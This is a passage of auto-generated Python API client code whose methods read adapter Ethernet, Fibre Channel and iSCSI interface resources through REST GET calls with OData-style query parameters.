'inlinecount'] is not None: # noqa: E501
query_params.append(
('$inlinecount',
local_var_params['inlinecount'])) # noqa: E501
if 'at' in local_var_params and local_var_params[
'at'] is not None: # noqa: E501
query_params.append(('at', local_var_params['at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/ExtEthInterfaces',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterExtEthInterfaceList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_adapter_host_eth_interface_by_moid(self, moid,
**kwargs): # noqa: E501
"""Read an 'adapter.HostEthInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_host_eth_interface_by_moid(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute the request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AdapterHostEthInterface
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_adapter_host_eth_interface_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
def get_adapter_host_eth_interface_by_moid_with_http_info(
self, moid, **kwargs): # noqa: E501
"""Read an 'adapter.HostEthInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_host_eth_interface_by_moid_with_http_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _return_http_data_only: response data without HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AdapterHostEthInterface, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_adapter_host_eth_interface_by_moid" % key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `get_adapter_host_eth_interface_by_moid`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/HostEthInterfaces/{Moid}',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterHostEthInterface', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_adapter_host_eth_interface_list(self, **kwargs): # noqa: E501
"""Read an 'adapter.HostEthInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_host_eth_interface_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AdapterHostEthInterfaceList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_adapter_host_eth_interface_list_with_http_info(
**kwargs) # noqa: E501
def get_adapter_host_eth_interface_list_with_http_info(
self, **kwargs): # noqa: E501
"""Read an 'adapter.HostEthInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_host_eth_interface_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _return_http_data_only: response data without HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AdapterHostEthInterfaceList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
'count', 'inlinecount', 'at'
] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_adapter_host_eth_interface_list" % key)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in local_var_params and local_var_params[
'filter'] is not None: # noqa: E501
query_params.append(
('$filter', local_var_params['filter'])) # noqa: E501
if 'orderby' in local_var_params and local_var_params[
'orderby'] is not None: # noqa: E501
query_params.append(
('$orderby', local_var_params['orderby'])) # noqa: E501
if 'top' in local_var_params and local_var_params[
'top'] is not None: # noqa: E501
query_params.append(
('$top', local_var_params['top'])) # noqa: E501
if 'skip' in local_var_params and local_var_params[
'skip'] is not None: # noqa: E501
query_params.append(
('$skip', local_var_params['skip'])) # noqa: E501
if 'select' in local_var_params and local_var_params[
'select'] is not None: # noqa: E501
query_params.append(
('$select', local_var_params['select'])) # noqa: E501
if 'expand' in local_var_params and local_var_params[
'expand'] is not None: # noqa: E501
query_params.append(
('$expand', local_var_params['expand'])) # noqa: E501
if 'apply' in local_var_params and local_var_params[
'apply'] is not None: # noqa: E501
query_params.append(
('$apply', local_var_params['apply'])) # noqa: E501
if 'count' in local_var_params and local_var_params[
'count'] is not None: # noqa: E501
query_params.append(
('$count', local_var_params['count'])) # noqa: E501
if 'inlinecount' in local_var_params and local_var_params[
'inlinecount'] is not None: # noqa: E501
query_params.append(
('$inlinecount',
local_var_params['inlinecount'])) # noqa: E501
if 'at' in local_var_params and local_var_params[
'at'] is not None: # noqa: E501
query_params.append(('at', local_var_params['at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/HostEthInterfaces',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterHostEthInterfaceList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_adapter_host_fc_interface_by_moid(self, moid,
**kwargs): # noqa: E501
"""Read an 'adapter.HostFcInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_host_fc_interface_by_moid(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AdapterHostFcInterface
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_adapter_host_fc_interface_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
def get_adapter_host_fc_interface_by_moid_with_http_info(
self, moid, **kwargs): # noqa: E501
"""Read an 'adapter.HostFcInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_host_fc_interface_by_moid_with_http_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _return_http_data_only: response data without HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AdapterHostFcInterface, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_adapter_host_fc_interface_by_moid" % key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `get_adapter_host_fc_interface_by_moid`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/HostFcInterfaces/{Moid}',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterHostFcInterface', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_adapter_host_fc_interface_list(self, **kwargs): # noqa: E501
"""Read an 'adapter.HostFcInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_host_fc_interface_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AdapterHostFcInterfaceList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_adapter_host_fc_interface_list_with_http_info(
**kwargs) # noqa: E501
def get_adapter_host_fc_interface_list_with_http_info(
self, **kwargs): # noqa: E501
"""Read an 'adapter.HostFcInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_host_fc_interface_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _return_http_data_only: response data without HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AdapterHostFcInterfaceList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
'count', 'inlinecount', 'at'
] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_adapter_host_fc_interface_list" % key)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in local_var_params and local_var_params[
'filter'] is not None: # noqa: E501
query_params.append(
('$filter', local_var_params['filter'])) # noqa: E501
if 'orderby' in local_var_params and local_var_params[
'orderby'] is not None: # noqa: E501
query_params.append(
('$orderby', local_var_params['orderby'])) # noqa: E501
if 'top' in local_var_params and local_var_params[
'top'] is not None: # noqa: E501
query_params.append(
('$top', local_var_params['top'])) # noqa: E501
if 'skip' in local_var_params and local_var_params[
'skip'] is not None: # noqa: E501
query_params.append(
('$skip', local_var_params['skip'])) # noqa: E501
if 'select' in local_var_params and local_var_params[
'select'] is not None: # noqa: E501
query_params.append(
('$select', local_var_params['select'])) # noqa: E501
if 'expand' in local_var_params and local_var_params[
'expand'] is not None: # noqa: E501
query_params.append(
('$expand', local_var_params['expand'])) # noqa: E501
if 'apply' in local_var_params and local_var_params[
'apply'] is not None: # noqa: E501
query_params.append(
('$apply', local_var_params['apply'])) # noqa: E501
if 'count' in local_var_params and local_var_params[
'count'] is not None: # noqa: E501
query_params.append(
('$count', local_var_params['count'])) # noqa: E501
if 'inlinecount' in local_var_params and local_var_params[
'inlinecount'] is not None: # noqa: E501
query_params.append(
('$inlinecount',
local_var_params['inlinecount'])) # noqa: E501
if 'at' in local_var_params and local_var_params[
'at'] is not None: # noqa: E501
query_params.append(('at', local_var_params['at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/HostFcInterfaces',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterHostFcInterfaceList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_adapter_host_iscsi_interface_by_moid(self, moid,
**kwargs): # noqa: E501
"""Read a 'adapter.HostIscsiInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_host_iscsi_interface_by_moid(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a
                         single number is provided, it is used as the
                         total request timeout. It can also be a pair
                         (tuple) of (connection, read) timeouts.
:return: AdapterHostIscsiInterface
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_adapter_host_iscsi_interface_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
def get_adapter_host_iscsi_interface_by_moid_with_http_info(
self, moid, **kwargs): # noqa: E501
"""Read a 'adapter.HostIscsiInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_host_iscsi_interface_by_moid_with_http_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _return_http_data_only: if True, return the response data only,
                               without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a
                         single number is provided, it is used as the
                         total request timeout. It can also be a pair
                         (tuple) of (connection, read) timeouts.
:return: tuple(AdapterHostIscsiInterface, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_adapter_host_iscsi_interface_by_moid" %
key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `get_adapter_host_iscsi_interface_by_moid`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/HostIscsiInterfaces/{Moid}',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterHostIscsiInterface', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
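    # Usage sketch: fetching a single 'adapter.HostIscsiInterface' by Moid.
    # Assumes `api` is an instance of this API class built on an
    # authenticated ApiClient; the Moid string below is illustrative only.
    #
    #   iface = api.get_adapter_host_iscsi_interface_by_moid('5f1b2c0d6e")
    #   data, status, headers = (
    #       api.get_adapter_host_iscsi_interface_by_moid_with_http_info(
    #           '5f1b2c0d6e'))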
def get_adapter_host_iscsi_interface_list(self, **kwargs): # noqa: E501
"""Read a 'adapter.HostIscsiInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_host_iscsi_interface_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a
                         single number is provided, it is used as the
                         total request timeout. It can also be a pair
                         (tuple) of (connection, read) timeouts.
:return: AdapterHostIscsiInterfaceList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_adapter_host_iscsi_interface_list_with_http_info(
**kwargs) # noqa: E501
def get_adapter_host_iscsi_interface_list_with_http_info(
self, **kwargs): # noqa: E501
"""Read a 'adapter.HostIscsiInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_host_iscsi_interface_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
